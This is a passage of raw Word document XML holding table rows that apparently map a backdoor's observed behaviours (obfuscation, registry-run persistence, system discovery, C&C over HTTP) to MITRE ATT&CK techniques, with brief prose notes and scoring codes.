        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C2073" w:rsidRPr="00DF3093" w14:paraId="1C1F4704" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4175EEF8" w14:textId="77777777" w:rsidR="006C2073" w:rsidRPr="00DF3093" w:rsidRDefault="006C2073" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645D7CDA" w14:textId="730C4620" w:rsidR="006C2073" w:rsidRPr="00DF3093" w:rsidRDefault="006C2073" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="718BB273" w14:textId="517B1528" w:rsidR="006C2073" w:rsidRPr="00DF3093" w:rsidRDefault="006C2073" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C2073">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C2073">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C2073">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1749DE44" w14:textId="5896542E" w:rsidR="006C2073" w:rsidRPr="00DF3093" w:rsidRDefault="000E1F2D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07E08D2E" w14:textId="77777777" w:rsidR="006C2073" w:rsidRPr="00DF3093" w:rsidRDefault="006C2073" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C94D336" w14:textId="6ED20A04" w:rsidR="006C2073" w:rsidRPr="00DF3093" w:rsidRDefault="00E47B76" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04778C9F" w14:textId="634036FA" w:rsidR="006C2073" w:rsidRPr="00DF3093" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA1FC19" w14:textId="77777777" w:rsidR="006C2073" w:rsidRDefault="006C2073" w:rsidP="006C2073">
            <w:r>
              <w:t xml:space="preserve">[1] The backdoor is still written in pure x86 assembly but its size increased a lot – from 20 KB to 200+ KB. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795A669B" w14:textId="04912D95" w:rsidR="006C2073" w:rsidRPr="007B6902" w:rsidRDefault="006C2073" w:rsidP="006C2073">
            <w:r>
              <w:t xml:space="preserve">This is due to the addition of obfuscation, mainly control-flow flattening </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C2073" w:rsidRPr="00DF3093" w14:paraId="6C5CA549" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76DABE9C" w14:textId="67B92424" w:rsidR="00DF3093" w:rsidRPr="00DF3093" w:rsidRDefault="00DF3093" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006C2073">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40CF6261" w14:textId="03F1630A" w:rsidR="00DF3093" w:rsidRPr="00DF3093" w:rsidRDefault="00563670" w:rsidP="00E530D0">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2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EFDF8E1" w14:textId="5128F1C5" w:rsidR="00DF3093" w:rsidRPr="00DF3093" w:rsidRDefault="00DF3093" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF3093">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2041C12F" w14:textId="56B54B6C" w:rsidR="00DF3093" w:rsidRPr="00DF3093" w:rsidRDefault="000E1F2D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="159CDBDA" w14:textId="77777777" w:rsidR="00DF3093" w:rsidRPr="00DF3093" w:rsidRDefault="00DF3093" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DAB0161" w14:textId="32F07F73" w:rsidR="00DF3093" w:rsidRPr="00DF3093" w:rsidRDefault="007B6902" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6460AF24" w14:textId="6CE6CE38" w:rsidR="00DF3093" w:rsidRPr="00DF3093" w:rsidRDefault="00F63836" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C2BEE2A" w14:textId="79AC6408" w:rsidR="00DF3093" w:rsidRPr="007B6902" w:rsidRDefault="007B6902" w:rsidP="00E530D0">
            <w:r>
              <w:t xml:space="preserve">[1] does not clarify persistence. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>E.g.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from [2] used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="005B3D45" w14:paraId="73D9F645" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AC934CE" w14:textId="3EC383F8" w:rsidR="00A24CD0" w:rsidRPr="005B3D45" w:rsidRDefault="00A24CD0" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FB7125" w14:textId="77777777" w:rsidR="00A24CD0" w:rsidRPr="005B3D45" w:rsidRDefault="00A24CD0" w:rsidP="00E530D0">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503055A8" w14:textId="77777777" w:rsidR="00A24CD0" w:rsidRPr="005B3D45" w:rsidRDefault="00A24CD0" w:rsidP="00E530D0">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6952F73A" w14:textId="500A1211" w:rsidR="00A24CD0" w:rsidRPr="005B3D45" w:rsidRDefault="003C59BF" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE36D2C" w14:textId="77777777" w:rsidR="00A24CD0" w:rsidRPr="005B3D45" w:rsidRDefault="00A24CD0" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E0098C" w14:textId="77777777" w:rsidR="00A24CD0" w:rsidRPr="005B3D45" w:rsidRDefault="00A24CD0" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EDB3485" w14:textId="5ED1618C" w:rsidR="00A24CD0" w:rsidRPr="005B3D45" w:rsidRDefault="00D15E27" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B8E652A" w14:textId="77777777" w:rsidR="00A24CD0" w:rsidRPr="00A24CD0" w:rsidRDefault="00A24CD0" w:rsidP="00A24CD0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A24CD0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The network communication is relatively simple. It can use the GET, POST and PUT HTTP methods to contact </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A7ACB67" w14:textId="10CBD5A7" w:rsidR="00A24CD0" w:rsidRPr="00A164AD" w:rsidRDefault="00A24CD0" w:rsidP="00A24CD0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A24CD0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>the hardcoded C&amp;C server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="00412964" w14:paraId="77ABEC07" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673786DA" w14:textId="38B30A0B" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="00412964" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00412964">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="583D5713" w14:textId="5B0212E6" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="00412964" w:rsidP="00E530D0">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0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="444253BC" w14:textId="17B85EEA" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="00412964" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00412964">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00412964">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1082 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00412964">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F933959" w14:textId="6FFC6CA8" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="00412964" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E0BF44F" w14:textId="77777777" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="00DF3093" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BA84087" w14:textId="17053601" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="00412964" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C08657" w14:textId="1FD50ADD" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="008E328C" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74EE5E7E" w14:textId="447A1023" w:rsidR="00DF3093" w:rsidRPr="00412964" w:rsidRDefault="00412964" w:rsidP="00E530D0">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00CC1C25" w:rsidRPr="00CC1C25">
              <w:t xml:space="preserve">Getting system information (hostname, ID, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CC1C25" w:rsidRPr="00CC1C25">
              <w:t>pipename</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CC1C25" w:rsidRPr="00CC1C25">
              <w:t>, HTTP method)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="005B3D45" w14:paraId="237ACD3E" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6901020A" w14:textId="2F8A5544" w:rsidR="00CC1C25" w:rsidRPr="005B3D45" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66B81D36" w14:textId="77777777" w:rsidR="00CC1C25" w:rsidRPr="005B3D45" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">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404589D1" w14:textId="77777777" w:rsidR="00CC1C25" w:rsidRPr="005B3D45" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C4F1AA" w14:textId="3ABC434D" w:rsidR="00CC1C25" w:rsidRPr="005B3D45" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C77DF54" w14:textId="77777777" w:rsidR="00CC1C25" w:rsidRPr="005B3D45" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DBF4173" w14:textId="77777777" w:rsidR="00CC1C25" w:rsidRPr="005B3D45" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D3ED1DC" w14:textId="74FC8291" w:rsidR="00CC1C25" w:rsidRPr="005B3D45" w:rsidRDefault="008E328C" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E05D324" w14:textId="77777777" w:rsidR="00CC1C25" w:rsidRPr="00A24CD0" w:rsidRDefault="00CC1C25" w:rsidP="00E530D0">
